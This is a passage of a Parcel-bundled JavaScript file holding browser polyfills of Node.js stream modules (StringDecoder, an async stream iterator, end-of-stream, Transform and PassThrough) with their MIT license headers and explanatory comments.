            else console.warn(msg);
            warned = true;
        }
        return fn.apply(this, arguments);
    }
    return deprecated;
}
/**
 * Checks `localStorage` for boolean values for the given `name`.
 *
 * @param {String} name
 * @returns {Boolean}
 * @api private
 */ function $24ba9cfc39d77116$var$config(name) {
    // accessing global.localStorage can trigger a DOMException in sandboxed iframes
    try {
        if (!$parcel$global.localStorage) return false;
    } catch (_) {
        return false;
    }
    var val = $parcel$global.localStorage[name];
    if (null == val) return false;
    return String(val).toLowerCase() === "true";
}

});



parcelRequire.register("eNRCS", function(module, exports) {

$parcel$export(module.exports, "StringDecoder", () => $ac6f3d51130904be$export$63a7aa211a91ed69, (v) => $ac6f3d51130904be$export$63a7aa211a91ed69 = v);
// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.
// StringDecoder provides an interface for efficiently splitting a series of
// buffers into a series of JS strings without breaking apart multi-byte
// characters.
var $ac6f3d51130904be$export$63a7aa211a91ed69;
"use strict";

var $1U9GM = parcelRequire("1U9GM");
var $ac6f3d51130904be$require$Buffer = $1U9GM.Buffer;
/*</replacement>*/ var $ac6f3d51130904be$var$isEncoding = $ac6f3d51130904be$require$Buffer.isEncoding || function(encoding) {
    encoding = "" + encoding;
    switch(encoding && encoding.toLowerCase()){
        case "hex":
        case "utf8":
        case "utf-8":
        case "ascii":
        case "binary":
        case "base64":
        case "ucs2":
        case "ucs-2":
        case "utf16le":
        case "utf-16le":
        case "raw":
            return true;
        default:
            return false;
    }
};
function $ac6f3d51130904be$var$_normalizeEncoding(enc) {
    if (!enc) return "utf8";
    var retried;
    while(true)switch(enc){
        case "utf8":
        case "utf-8":
            return "utf8";
        case "ucs2":
        case "ucs-2":
        case "utf16le":
        case "utf-16le":
            return "utf16le";
        case "latin1":
        case "binary":
            return "latin1";
        case "base64":
        case "ascii":
        case "hex":
            return enc;
        default:
            if (retried) return; // undefined
            enc = ("" + enc).toLowerCase();
            retried = true;
    }
}
// Do not cache `Buffer.isEncoding` when checking encoding names as some
// modules monkey-patch it to support additional encodings
function $ac6f3d51130904be$var$normalizeEncoding(enc) {
    var nenc = $ac6f3d51130904be$var$_normalizeEncoding(enc);
    if (typeof nenc !== "string" && ($ac6f3d51130904be$require$Buffer.isEncoding === $ac6f3d51130904be$var$isEncoding || !$ac6f3d51130904be$var$isEncoding(enc))) throw new Error("Unknown encoding: " + enc);
    return nenc || enc;
}
$ac6f3d51130904be$export$63a7aa211a91ed69 = $ac6f3d51130904be$var$StringDecoder;
function $ac6f3d51130904be$var$StringDecoder(encoding) {
    this.encoding = $ac6f3d51130904be$var$normalizeEncoding(encoding);
    var nb;
    switch(this.encoding){
        case "utf16le":
            this.text = $ac6f3d51130904be$var$utf16Text;
            this.end = $ac6f3d51130904be$var$utf16End;
            nb = 4;
            break;
        case "utf8":
            this.fillLast = $ac6f3d51130904be$var$utf8FillLast;
            nb = 4;
            break;
        case "base64":
            this.text = $ac6f3d51130904be$var$base64Text;
            this.end = $ac6f3d51130904be$var$base64End;
            nb = 3;
            break;
        default:
            this.write = $ac6f3d51130904be$var$simpleWrite;
            this.end = $ac6f3d51130904be$var$simpleEnd;
            return;
    }
    this.lastNeed = 0;
    this.lastTotal = 0;
    this.lastChar = $ac6f3d51130904be$require$Buffer.allocUnsafe(nb);
}
$ac6f3d51130904be$var$StringDecoder.prototype.write = function(buf) {
    if (buf.length === 0) return "";
    var r;
    var i;
    if (this.lastNeed) {
        r = this.fillLast(buf);
        if (r === undefined) return "";
        i = this.lastNeed;
        this.lastNeed = 0;
    } else i = 0;
    if (i < buf.length) return r ? r + this.text(buf, i) : this.text(buf, i);
    return r || "";
};
$ac6f3d51130904be$var$StringDecoder.prototype.end = $ac6f3d51130904be$var$utf8End;
// Returns only complete characters in a Buffer
$ac6f3d51130904be$var$StringDecoder.prototype.text = $ac6f3d51130904be$var$utf8Text;
// Attempts to complete a partial non-UTF-8 character using bytes from a Buffer
$ac6f3d51130904be$var$StringDecoder.prototype.fillLast = function(buf) {
    if (this.lastNeed <= buf.length) {
        buf.copy(this.lastChar, this.lastTotal - this.lastNeed, 0, this.lastNeed);
        return this.lastChar.toString(this.encoding, 0, this.lastTotal);
    }
    buf.copy(this.lastChar, this.lastTotal - this.lastNeed, 0, buf.length);
    this.lastNeed -= buf.length;
};
// Checks the type of a UTF-8 byte, whether it's ASCII, a leading byte, or a
// continuation byte. If an invalid byte is detected, -2 is returned.
function $ac6f3d51130904be$var$utf8CheckByte(byte) {
    if (byte <= 0x7F) return 0;
    else if (byte >> 5 === 0x06) return 2;
    else if (byte >> 4 === 0x0E) return 3;
    else if (byte >> 3 === 0x1E) return 4;
    return byte >> 6 === 0x02 ? -1 : -2;
}
// Checks at most 3 bytes at the end of a Buffer in order to detect an
// incomplete multi-byte UTF-8 character. The total number of bytes (2, 3, or 4)
// needed to complete the UTF-8 character (if applicable) are returned.
function $ac6f3d51130904be$var$utf8CheckIncomplete(self, buf, i) {
    var j = buf.length - 1;
    if (j < i) return 0;
    var nb = $ac6f3d51130904be$var$utf8CheckByte(buf[j]);
    if (nb >= 0) {
        if (nb > 0) self.lastNeed = nb - 1;
        return nb;
    }
    if (--j < i || nb === -2) return 0;
    nb = $ac6f3d51130904be$var$utf8CheckByte(buf[j]);
    if (nb >= 0) {
        if (nb > 0) self.lastNeed = nb - 2;
        return nb;
    }
    if (--j < i || nb === -2) return 0;
    nb = $ac6f3d51130904be$var$utf8CheckByte(buf[j]);
    if (nb >= 0) {
        if (nb > 0) {
            if (nb === 2) nb = 0;
            else self.lastNeed = nb - 3;
        }
        return nb;
    }
    return 0;
}
// Validates as many continuation bytes for a multi-byte UTF-8 character as
// needed or are available. If we see a non-continuation byte where we expect
// one, we "replace" the validated continuation bytes we've seen so far with
// a single UTF-8 replacement character ('\ufffd'), to match v8's UTF-8 decoding
// behavior. The continuation byte check is included three times in the case
// where all of the continuation bytes for a character exist in the same buffer.
// It is also done this way as a slight performance increase instead of using a
// loop.
function $ac6f3d51130904be$var$utf8CheckExtraBytes(self, buf, p) {
    if ((buf[0] & 0xC0) !== 0x80) {
        self.lastNeed = 0;
        return "�";
    }
    if (self.lastNeed > 1 && buf.length > 1) {
        if ((buf[1] & 0xC0) !== 0x80) {
            self.lastNeed = 1;
            return "�";
        }
        if (self.lastNeed > 2 && buf.length > 2) {
            if ((buf[2] & 0xC0) !== 0x80) {
                self.lastNeed = 2;
                return "�";
            }
        }
    }
}
// Attempts to complete a multi-byte UTF-8 character using bytes from a Buffer.
function $ac6f3d51130904be$var$utf8FillLast(buf) {
    var p = this.lastTotal - this.lastNeed;
    var r = $ac6f3d51130904be$var$utf8CheckExtraBytes(this, buf, p);
    if (r !== undefined) return r;
    if (this.lastNeed <= buf.length) {
        buf.copy(this.lastChar, p, 0, this.lastNeed);
        return this.lastChar.toString(this.encoding, 0, this.lastTotal);
    }
    buf.copy(this.lastChar, p, 0, buf.length);
    this.lastNeed -= buf.length;
}
// Returns all complete UTF-8 characters in a Buffer. If the Buffer ended on a
// partial character, the character's bytes are buffered until the required
// number of bytes are available.
function $ac6f3d51130904be$var$utf8Text(buf, i) {
    var total = $ac6f3d51130904be$var$utf8CheckIncomplete(this, buf, i);
    if (!this.lastNeed) return buf.toString("utf8", i);
    this.lastTotal = total;
    var end = buf.length - (total - this.lastNeed);
    buf.copy(this.lastChar, 0, end);
    return buf.toString("utf8", i, end);
}
// For UTF-8, a replacement character is added when ending on a partial
// character.
function $ac6f3d51130904be$var$utf8End(buf) {
    var r = buf && buf.length ? this.write(buf) : "";
    if (this.lastNeed) return r + "�";
    return r;
}
// UTF-16LE typically needs two bytes per character, but even if we have an even
// number of bytes available, we need to check if we end on a leading/high
// surrogate. In that case, we need to wait for the next two bytes in order to
// decode the last character properly.
function $ac6f3d51130904be$var$utf16Text(buf, i) {
    if ((buf.length - i) % 2 === 0) {
        var r = buf.toString("utf16le", i);
        if (r) {
            var c = r.charCodeAt(r.length - 1);
            if (c >= 0xD800 && c <= 0xDBFF) {
                this.lastNeed = 2;
                this.lastTotal = 4;
                this.lastChar[0] = buf[buf.length - 2];
                this.lastChar[1] = buf[buf.length - 1];
                return r.slice(0, -1);
            }
        }
        return r;
    }
    this.lastNeed = 1;
    this.lastTotal = 2;
    this.lastChar[0] = buf[buf.length - 1];
    return buf.toString("utf16le", i, buf.length - 1);
}
// For UTF-16LE we do not explicitly append special replacement characters if we
// end on a partial character, we simply let v8 handle that.
function $ac6f3d51130904be$var$utf16End(buf) {
    var r = buf && buf.length ? this.write(buf) : "";
    if (this.lastNeed) {
        var end = this.lastTotal - this.lastNeed;
        return r + this.lastChar.toString("utf16le", 0, end);
    }
    return r;
}
function $ac6f3d51130904be$var$base64Text(buf, i) {
    var n = (buf.length - i) % 3;
    if (n === 0) return buf.toString("base64", i);
    this.lastNeed = 3 - n;
    this.lastTotal = 3;
    if (n === 1) this.lastChar[0] = buf[buf.length - 1];
    else {
        this.lastChar[0] = buf[buf.length - 2];
        this.lastChar[1] = buf[buf.length - 1];
    }
    return buf.toString("base64", i, buf.length - n);
}
function $ac6f3d51130904be$var$base64End(buf) {
    var r = buf && buf.length ? this.write(buf) : "";
    if (this.lastNeed) return r + this.lastChar.toString("base64", 0, 3 - this.lastNeed);
    return r;
}
// Pass bytes on through for single-byte encodings (e.g. ascii, latin1, hex)
function $ac6f3d51130904be$var$simpleWrite(buf) {
    return buf.toString(this.encoding);
}
function $ac6f3d51130904be$var$simpleEnd(buf) {
    return buf && buf.length ? this.write(buf) : "";
}

});

parcelRequire.register("2UdT6", function(module, exports) {

var $hPtJY = parcelRequire("hPtJY");
"use strict";
var $21db958e3a099d7d$var$_Object$setPrototypeO;
function $21db958e3a099d7d$var$_defineProperty(obj, key, value) {
    key = $21db958e3a099d7d$var$_toPropertyKey(key);
    if (key in obj) Object.defineProperty(obj, key, {
        value: value,
        enumerable: true,
        configurable: true,
        writable: true
    });
    else obj[key] = value;
    return obj;
}
function $21db958e3a099d7d$var$_toPropertyKey(arg) {
    var key = $21db958e3a099d7d$var$_toPrimitive(arg, "string");
    return typeof key === "symbol" ? key : String(key);
}
function $21db958e3a099d7d$var$_toPrimitive(input, hint) {
    if (typeof input !== "object" || input === null) return input;
    var prim = input[Symbol.toPrimitive];
    if (prim !== undefined) {
        var res = prim.call(input, hint || "default");
        if (typeof res !== "object") return res;
        throw new TypeError("@@toPrimitive must return a primitive value.");
    }
    return (hint === "string" ? String : Number)(input);
}

var $fiCvv = parcelRequire("fiCvv");
var $21db958e3a099d7d$var$kLastResolve = Symbol("lastResolve");
var $21db958e3a099d7d$var$kLastReject = Symbol("lastReject");
var $21db958e3a099d7d$var$kError = Symbol("error");
var $21db958e3a099d7d$var$kEnded = Symbol("ended");
var $21db958e3a099d7d$var$kLastPromise = Symbol("lastPromise");
var $21db958e3a099d7d$var$kHandlePromise = Symbol("handlePromise");
var $21db958e3a099d7d$var$kStream = Symbol("stream");
function $21db958e3a099d7d$var$createIterResult(value, done) {
    return {
        value: value,
        done: done
    };
}
function $21db958e3a099d7d$var$readAndResolve(iter) {
    var resolve = iter[$21db958e3a099d7d$var$kLastResolve];
    if (resolve !== null) {
        var data = iter[$21db958e3a099d7d$var$kStream].read();
        // we defer if data is null
        // we can be expecting either 'end' or
        // 'error'
        if (data !== null) {
            iter[$21db958e3a099d7d$var$kLastPromise] = null;
            iter[$21db958e3a099d7d$var$kLastResolve] = null;
            iter[$21db958e3a099d7d$var$kLastReject] = null;
            resolve($21db958e3a099d7d$var$createIterResult(data, false));
        }
    }
}
function $21db958e3a099d7d$var$onReadable(iter) {
    // we wait for the next tick, because it might
    // emit an error with process.nextTick
    $hPtJY.nextTick($21db958e3a099d7d$var$readAndResolve, iter);
}
function $21db958e3a099d7d$var$wrapForNext(lastPromise, iter) {
    return function(resolve, reject) {
        lastPromise.then(function() {
            if (iter[$21db958e3a099d7d$var$kEnded]) {
                resolve($21db958e3a099d7d$var$createIterResult(undefined, true));
                return;
            }
            iter[$21db958e3a099d7d$var$kHandlePromise](resolve, reject);
        }, reject);
    };
}
var $21db958e3a099d7d$var$AsyncIteratorPrototype = Object.getPrototypeOf(function() {});
var $21db958e3a099d7d$var$ReadableStreamAsyncIteratorPrototype = Object.setPrototypeOf(($21db958e3a099d7d$var$_Object$setPrototypeO = {
    get stream () {
        return this[$21db958e3a099d7d$var$kStream];
    },
    next: function next() {
        var _this = this;
        // if we have detected an error in the meanwhile
        // reject straight away
        var error = this[$21db958e3a099d7d$var$kError];
        if (error !== null) return Promise.reject(error);
        if (this[$21db958e3a099d7d$var$kEnded]) return Promise.resolve($21db958e3a099d7d$var$createIterResult(undefined, true));
        if (this[$21db958e3a099d7d$var$kStream].destroyed) // We need to defer via nextTick because if .destroy(err) is
        // called, the error will be emitted via nextTick, and
        // we cannot guarantee that there is no error lingering around
        // waiting to be emitted.
        return new Promise(function(resolve, reject) {
            $hPtJY.nextTick(function() {
                if (_this[$21db958e3a099d7d$var$kError]) reject(_this[$21db958e3a099d7d$var$kError]);
                else resolve($21db958e3a099d7d$var$createIterResult(undefined, true));
            });
        });
        // if we have multiple next() calls
        // we will wait for the previous Promise to finish
        // this logic is optimized to support for await loops,
        // where next() is only called once at a time
        var lastPromise = this[$21db958e3a099d7d$var$kLastPromise];
        var promise;
        if (lastPromise) promise = new Promise($21db958e3a099d7d$var$wrapForNext(lastPromise, this));
        else {
            // fast path needed to support multiple this.push()
            // without triggering the next() queue
            var data = this[$21db958e3a099d7d$var$kStream].read();
            if (data !== null) return Promise.resolve($21db958e3a099d7d$var$createIterResult(data, false));
            promise = new Promise(this[$21db958e3a099d7d$var$kHandlePromise]);
        }
        this[$21db958e3a099d7d$var$kLastPromise] = promise;
        return promise;
    }
}, $21db958e3a099d7d$var$_defineProperty($21db958e3a099d7d$var$_Object$setPrototypeO, Symbol.asyncIterator, function() {
    return this;
}), $21db958e3a099d7d$var$_defineProperty($21db958e3a099d7d$var$_Object$setPrototypeO, "return", function _return() {
    var _this2 = this;
    // destroy(err, cb) is a private API
    // we can guarantee we have that here, because we control the
    // Readable class this is attached to
    return new Promise(function(resolve, reject) {
        _this2[$21db958e3a099d7d$var$kStream].destroy(null, function(err) {
            if (err) {
                reject(err);
                return;
            }
            resolve($21db958e3a099d7d$var$createIterResult(undefined, true));
        });
    });
}), $21db958e3a099d7d$var$_Object$setPrototypeO), $21db958e3a099d7d$var$AsyncIteratorPrototype);
var $21db958e3a099d7d$var$createReadableStreamAsyncIterator = function createReadableStreamAsyncIterator(stream) {
    var _Object$create;
    var iterator = Object.create($21db958e3a099d7d$var$ReadableStreamAsyncIteratorPrototype, (_Object$create = {}, $21db958e3a099d7d$var$_defineProperty(_Object$create, $21db958e3a099d7d$var$kStream, {
        value: stream,
        writable: true
    }), $21db958e3a099d7d$var$_defineProperty(_Object$create, $21db958e3a099d7d$var$kLastResolve, {
        value: null,
        writable: true
    }), $21db958e3a099d7d$var$_defineProperty(_Object$create, $21db958e3a099d7d$var$kLastReject, {
        value: null,
        writable: true
    }), $21db958e3a099d7d$var$_defineProperty(_Object$create, $21db958e3a099d7d$var$kError, {
        value: null,
        writable: true
    }), $21db958e3a099d7d$var$_defineProperty(_Object$create, $21db958e3a099d7d$var$kEnded, {
        value: stream._readableState.endEmitted,
        writable: true
    }), $21db958e3a099d7d$var$_defineProperty(_Object$create, $21db958e3a099d7d$var$kHandlePromise, {
        value: function value(resolve, reject) {
            var data = iterator[$21db958e3a099d7d$var$kStream].read();
            if (data) {
                iterator[$21db958e3a099d7d$var$kLastPromise] = null;
                iterator[$21db958e3a099d7d$var$kLastResolve] = null;
                iterator[$21db958e3a099d7d$var$kLastReject] = null;
                resolve($21db958e3a099d7d$var$createIterResult(data, false));
            } else {
                iterator[$21db958e3a099d7d$var$kLastResolve] = resolve;
                iterator[$21db958e3a099d7d$var$kLastReject] = reject;
            }
        },
        writable: true
    }), _Object$create));
    iterator[$21db958e3a099d7d$var$kLastPromise] = null;
    $fiCvv(stream, function(err) {
        if (err && err.code !== "ERR_STREAM_PREMATURE_CLOSE") {
            var reject = iterator[$21db958e3a099d7d$var$kLastReject];
            // reject if we are waiting for data in the Promise
            // returned by next() and store the error
            if (reject !== null) {
                iterator[$21db958e3a099d7d$var$kLastPromise] = null;
                iterator[$21db958e3a099d7d$var$kLastResolve] = null;
                iterator[$21db958e3a099d7d$var$kLastReject] = null;
                reject(err);
            }
            iterator[$21db958e3a099d7d$var$kError] = err;
            return;
        }
        var resolve = iterator[$21db958e3a099d7d$var$kLastResolve];
        if (resolve !== null) {
            iterator[$21db958e3a099d7d$var$kLastPromise] = null;
            iterator[$21db958e3a099d7d$var$kLastResolve] = null;
            iterator[$21db958e3a099d7d$var$kLastReject] = null;
            resolve($21db958e3a099d7d$var$createIterResult(undefined, true));
        }
        iterator[$21db958e3a099d7d$var$kEnded] = true;
    });
    stream.on("readable", $21db958e3a099d7d$var$onReadable.bind(null, iterator));
    return iterator;
};
module.exports = $21db958e3a099d7d$var$createReadableStreamAsyncIterator;

});
parcelRequire.register("fiCvv", function(module, exports) {
// Ported from https://github.com/mafintosh/end-of-stream with
// permission from the author, Mathias Buus (@mafintosh).
"use strict";

var $6JySE = parcelRequire("6JySE");
var $b236683171fcb6ee$var$ERR_STREAM_PREMATURE_CLOSE = $6JySE.codes.ERR_STREAM_PREMATURE_CLOSE;
function $b236683171fcb6ee$var$once(callback) {
    var called = false;
    return function() {
        if (called) return;
        called = true;
        for(var _len = arguments.length, args = new Array(_len), _key = 0; _key < _len; _key++)args[_key] = arguments[_key];
        callback.apply(this, args);
    };
}
function $b236683171fcb6ee$var$noop() {}
function $b236683171fcb6ee$var$isRequest(stream) {
    return stream.setHeader && typeof stream.abort === "function";
}
function $b236683171fcb6ee$var$eos(stream, opts, callback) {
    if (typeof opts === "function") return $b236683171fcb6ee$var$eos(stream, null, opts);
    if (!opts) opts = {};
    callback = $b236683171fcb6ee$var$once(callback || $b236683171fcb6ee$var$noop);
    var readable = opts.readable || opts.readable !== false && stream.readable;
    var writable = opts.writable || opts.writable !== false && stream.writable;
    var onlegacyfinish = function onlegacyfinish() {
        if (!stream.writable) onfinish();
    };
    var writableEnded = stream._writableState && stream._writableState.finished;
    var onfinish = function onfinish() {
        writable = false;
        writableEnded = true;
        if (!readable) callback.call(stream);
    };
    var readableEnded = stream._readableState && stream._readableState.endEmitted;
    var onend = function onend() {
        readable = false;
        readableEnded = true;
        if (!writable) callback.call(stream);
    };
    var onerror = function onerror(err) {
        callback.call(stream, err);
    };
    var onclose = function onclose() {
        var err;
        if (readable && !readableEnded) {
            if (!stream._readableState || !stream._readableState.ended) err = new $b236683171fcb6ee$var$ERR_STREAM_PREMATURE_CLOSE();
            return callback.call(stream, err);
        }
        if (writable && !writableEnded) {
            if (!stream._writableState || !stream._writableState.ended) err = new $b236683171fcb6ee$var$ERR_STREAM_PREMATURE_CLOSE();
            return callback.call(stream, err);
        }
    };
    var onrequest = function onrequest() {
        stream.req.on("finish", onfinish);
    };
    if ($b236683171fcb6ee$var$isRequest(stream)) {
        stream.on("complete", onfinish);
        stream.on("abort", onclose);
        if (stream.req) onrequest();
        else stream.on("request", onrequest);
    } else if (writable && !stream._writableState) {
        // legacy streams
        stream.on("end", onlegacyfinish);
        stream.on("close", onlegacyfinish);
    }
    stream.on("end", onend);
    stream.on("finish", onfinish);
    if (opts.error !== false) stream.on("error", onerror);
    stream.on("close", onclose);
    return function() {
        stream.removeListener("complete", onfinish);
        stream.removeListener("abort", onclose);
        stream.removeListener("request", onrequest);
        if (stream.req) stream.req.removeListener("finish", onfinish);
        stream.removeListener("end", onlegacyfinish);
        stream.removeListener("close", onlegacyfinish);
        stream.removeListener("finish", onfinish);
        stream.removeListener("end", onend);
        stream.removeListener("error", onerror);
        stream.removeListener("close", onclose);
    };
}
module.exports = $b236683171fcb6ee$var$eos;

});


parcelRequire.register("e6P81", function(module, exports) {
module.exports = function() {
    throw new Error("Readable.from is not available in the browser");
};

});


parcelRequire.register("b7kl8", function(module, exports) {
// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.
// a transform stream is a readable/writable stream where you do
// something with the data.  Sometimes it's called a "filter",
// but that's not a great name for it, since that implies a thing where
// some bits pass through, and others are simply ignored.  (That would
// be a valid example of a transform, of course.)
//
// While the output is causally related to the input, it's not a
// necessarily symmetric or synchronous transformation.  For example,
// a zlib stream might take multiple plain-text writes(), and then
// emit a single compressed chunk some time in the future.
//
// Here's how this works:
//
// The Transform stream has all the aspects of the readable and writable
// stream classes.  When you write(chunk), that calls _write(chunk,cb)
// internally, and returns false if there's a lot of pending writes
// buffered up.  When you call read(), that calls _read(n) until
// there's enough pending readable data buffered up.
//
// In a transform stream, the written data is placed in a buffer.  When
// _read(n) is called, it transforms the queued up data, calling the
// buffered _write cb's as it consumes chunks.  If consuming a single
// written chunk would result in multiple output chunks, then the first
// outputted bit calls the readcb, and subsequent chunks just go into
// the read buffer, and will cause it to emit 'readable' if necessary.
//
// This way, back-pressure is actually determined by the reading side,
// since _read has to be called to start processing a new chunk.  However,
// a pathological inflate type of transform can cause excessive buffering
// here.  For example, imagine a stream where every byte of input is
// interpreted as an integer from 0-255, and then results in that many
// bytes of output.  Writing the 4 bytes {ff,ff,ff,ff} would result in
// 1kb of data being output.  In this case, you could write a very small
// amount of input, and end up with a very large amount of output.  In
// such a pathological inflating mechanism, there'd be no way to tell
// the system to stop doing the transform.  A single 4MB write could
// cause the system to run out of memory.
//
// However, even in such a pathological case, only a single written chunk
// would be consumed, and then the rest would wait (un-transformed) until
// the results of the previous transformed chunk were consumed.
"use strict";
module.exports = $8180203f7f0d3074$var$Transform;

var $6JySE = parcelRequire("6JySE");
var $8180203f7f0d3074$require$_require$codes = $6JySE.codes;
var $8180203f7f0d3074$var$ERR_METHOD_NOT_IMPLEMENTED = $8180203f7f0d3074$require$_require$codes.ERR_METHOD_NOT_IMPLEMENTED, $8180203f7f0d3074$var$ERR_MULTIPLE_CALLBACK = $8180203f7f0d3074$require$_require$codes.ERR_MULTIPLE_CALLBACK, $8180203f7f0d3074$var$ERR_TRANSFORM_ALREADY_TRANSFORMING = $8180203f7f0d3074$require$_require$codes.ERR_TRANSFORM_ALREADY_TRANSFORMING, $8180203f7f0d3074$var$ERR_TRANSFORM_WITH_LENGTH_0 = $8180203f7f0d3074$require$_require$codes.ERR_TRANSFORM_WITH_LENGTH_0;

var $DwJuQ = parcelRequire("DwJuQ");

(parcelRequire("dlqwk"))($8180203f7f0d3074$var$Transform, $DwJuQ);
function $8180203f7f0d3074$var$afterTransform(er, data) {
    var ts = this._transformState;
    ts.transforming = false;
    var cb = ts.writecb;
    if (cb === null) return this.emit("error", new $8180203f7f0d3074$var$ERR_MULTIPLE_CALLBACK());
    ts.writechunk = null;
    ts.writecb = null;
    if (data != null) // single equals check for both `null` and `undefined`
    this.push(data);
    cb(er);
    var rs = this._readableState;
    rs.reading = false;
    if (rs.needReadable || rs.length < rs.highWaterMark) this._read(rs.highWaterMark);
}
function $8180203f7f0d3074$var$Transform(options) {
    if (!(this instanceof $8180203f7f0d3074$var$Transform)) return new $8180203f7f0d3074$var$Transform(options);
    $DwJuQ.call(this, options);
    this._transformState = {
        afterTransform: $8180203f7f0d3074$var$afterTransform.bind(this),
        needTransform: false,
        transforming: false,
        writecb: null,
        writechunk: null,
        writeencoding: null
    };
    // start out asking for a readable event once data is transformed.
    this._readableState.needReadable = true;
    // we have implemented the _read method, and done the other things
    // that Readable wants before the first _read call, so unset the
    // sync guard flag.
    this._readableState.sync = false;
    if (options) {
        if (typeof options.transform === "function") this._transform = options.transform;
        if (typeof options.flush === "function") this._flush = options.flush;
    }
    // When the writable side finishes, then flush out anything remaining.
    this.on("prefinish", $8180203f7f0d3074$var$prefinish);
}
function $8180203f7f0d3074$var$prefinish() {
    var _this = this;
    if (typeof this._flush === "function" && !this._readableState.destroyed) this._flush(function(er, data) {
        $8180203f7f0d3074$var$done(_this, er, data);
    });
    else $8180203f7f0d3074$var$done(this, null, null);
}
$8180203f7f0d3074$var$Transform.prototype.push = function(chunk, encoding) {
    this._transformState.needTransform = false;
    return $DwJuQ.prototype.push.call(this, chunk, encoding);
};
// This is the part where you do stuff!
// override this function in implementation classes.
// 'chunk' is an input chunk.
//
// Call `push(newChunk)` to pass along transformed output
// to the readable side.  You may call 'push' zero or more times.
//
// Call `cb(err)` when you are done with this chunk.  If you pass
// an error, then that'll put the hurt on the whole operation.  If you
// never call cb(), then you'll never get another chunk.
$8180203f7f0d3074$var$Transform.prototype._transform = function(chunk, encoding, cb) {
    cb(new $8180203f7f0d3074$var$ERR_METHOD_NOT_IMPLEMENTED("_transform()"));
};
$8180203f7f0d3074$var$Transform.prototype._write = function(chunk, encoding, cb) {
    var ts = this._transformState;
    ts.writecb = cb;
    ts.writechunk = chunk;
    ts.writeencoding = encoding;
    if (!ts.transforming) {
        var rs = this._readableState;
        if (ts.needTransform || rs.needReadable || rs.length < rs.highWaterMark) this._read(rs.highWaterMark);
    }
};
// Doesn't matter what the args are here.
// _transform does all the work.
// That we got here means that the readable side wants more data.
$8180203f7f0d3074$var$Transform.prototype._read = function(n) {
    var ts = this._transformState;
    if (ts.writechunk !== null && !ts.transforming) {
        ts.transforming = true;
        this._transform(ts.writechunk, ts.writeencoding, ts.afterTransform);
    } else // mark that we need a transform, so that any data that comes in
    // will get processed, now that we've asked for it.
    ts.needTransform = true;
};
$8180203f7f0d3074$var$Transform.prototype._destroy = function(err, cb) {
    $DwJuQ.prototype._destroy.call(this, err, function(err2) {
        cb(err2);
    });
};
function $8180203f7f0d3074$var$done(stream, er, data) {
    if (er) return stream.emit("error", er);
    if (data != null) // single equals check for both `null` and `undefined`
    stream.push(data);
    // TODO(BridgeAR): Write a test for these two error cases
    // if there's nothing in the write buffer, then that means
    // that nothing more will ever be provided
    if (stream._writableState.length) throw new $8180203f7f0d3074$var$ERR_TRANSFORM_WITH_LENGTH_0();
    if (stream._transformState.transforming) throw new $8180203f7f0d3074$var$ERR_TRANSFORM_ALREADY_TRANSFORMING();
    return stream.push(null);
}

});

parcelRequire.register("4wWcs", function(module, exports) {
// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.
// a passthrough stream.
// basically just the most minimal sort of Transform stream.
// Every written chunk gets output as-is.
"use strict";
module.exports = $34c74be520d619f2$var$PassThrough;

var $b7kl8 = parcelRequire("b7kl8");

(parcelRequire("dlqwk"))($34c74be520d619f2$var$PassThrough, $b7kl8);
function $34c74be520d619f2$var$PassThrough(options) {
    if (!(this instanceof $34c74be520d619f2$var$PassThrough)) return new $34c74be520d619f2$var$PassThrough(options);
    $b7kl8.call(this, options);
}
$34c74be520d619f2$var$PassThrough.prototype._transform = function(chunk, encoding, cb) {
